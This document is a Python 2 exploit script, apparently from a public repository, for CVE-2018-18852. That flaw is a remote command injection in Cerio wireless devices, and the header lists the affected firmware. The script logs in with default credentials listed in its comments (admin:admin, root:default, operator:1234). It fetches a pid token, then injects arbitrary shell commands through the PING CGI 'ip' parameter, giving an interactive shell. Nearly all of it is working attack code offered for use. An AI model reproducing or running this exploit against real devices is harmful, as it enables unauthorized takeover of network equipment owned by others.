README.md
Rendering markdown...
#!/bin/env python
import requests
from requests.auth import HTTPBasicAuth
import json
import sys
import base64
def getToken():
# b3BlcmF0b3I6MTIzNA== - operator:1234
# YWRtaW46YWRtaW4= - admin:admin
# cm9vdDpkZWZhdWx0 - root:default
print "not implemented, enter creds manually on the cli"
def main():
print '[*] ================================================'
print '[*] Cerio RCE CVE-2018-18852, confirmed on; '
print '[*] - Cerio DT-300N-NGS-M - fw: Pme-CPE-AP12X V1.0.3'
print '[*] - Cerio DT-300N - fw: Cen-CPE-N2H10A V1.0.14, Cen-CPE-N2H10A V1.1.6, Cen-CPE-N2H10A V1.1.7'
print '[*] - Cerio DT-100G-N - fw: Cen-AP-N2H10A V1.0.8'
print '[*] - Cerio DT-100G - fw: Cen-WR-G2H5 V1.0.7'
print '[*] - Cerio DT-100GX-N - fw: Cen-AP-N2H8A V1.0.18'
print '[*] - Cerio AMR-3204G - fw: Cen-AC V2.0.19'
print '[*] - Cerio WMR-200N - fw: Cen-HS-N2H1 V1.0.6c Test'
print '[*] '
print '[/] by hook (@hook_s3c) https://github.com/hook-s3c/CVE-2018-18852 '
print '[/] Greetz to vap0rsquad, ThugCrowd, $noHat$, r0bl0xgang, Udderly Amoosing, illmob, '
print '[/] The Many Hats Club, Cyber.Phunk, WAC, SHAM, 0x00sec, John McAfee'
print '[/] Go cop YTCracker\'s Introducing Neals, gov overreach is no joke - wake the fuck up'
print '[*] ================================================'
if (len(sys.argv) <= 3):
print '[*] Usage: exploit.py <ipaddress> <port> <creds>'
exit(0)
host = sys.argv[1]
port = sys.argv[2]
creds = sys.argv[3]
b64Val = base64.b64encode(creds)
httpOrHttps = "https" if port is 443 else "http"
while True:
try:
cmd = raw_input('root@cerio:~# ')
if cmd.strip() == '':
print '[*] Enter command below\n'
continue
else:
model = 'DT-300N-NGS-M'
url = 'http://'+host+':'+port+'/cgi-bin/main.cgi?cgi=PING&mode=9'
payload = {'cgi': 'PING', 'mode': 9}
headers = {'content-type': 'application/json','Host': host,'Accept-Encoding': 'gzip, deflate', 'Content-Length' : '0', 'Connection' : 'keep-alive','Authorization': 'Basic %s' % b64Val}
getPid = requests.post(url, data=payload, headers=headers)
# thought about cycling creds for the pid token, but will leave that up to you
# throw me a PR
# getToken()
if getPid.status_code == requests.codes.not_found:
print "[!] This may not be the right model (DT-300N-NGS-M), trying again"
url = 'http://'+host+':'+port+'/cgi-bin/Save.cgi?cgi=PING'
getPid = requests.post(url, data=payload, headers=headers)
if getPid.status_code == requests.codes.ok:
model = 'DT-300N'
if getPid.status_code == requests.codes.unauthorized:
print "[!] Auth is invalid, try other creds"
exit(0)
if getPid.status_code == requests.codes.ok:
# drop this where you need to for debugging
# print getPid.status_code
binary = getPid.content
output = json.loads(binary)
pid = output['pid'] if model is 'DT-300N-NGS-M' else output
print "[+] Sucessfully grabbed pid token: %s" % pid
payload = {'ip': '127.0.0.1;' + 'echo "[[[";' + cmd, 'pid': pid, 'Times' : 1}
getData = requests.post(url, data=payload, headers=headers)
output_delimiter = '[[[' if model is 'DT-300N-NGS-M' else '/html'
print getData.content.split(output_delimiter)[1]
except Exception:
break
if __name__ == "__main__":
main()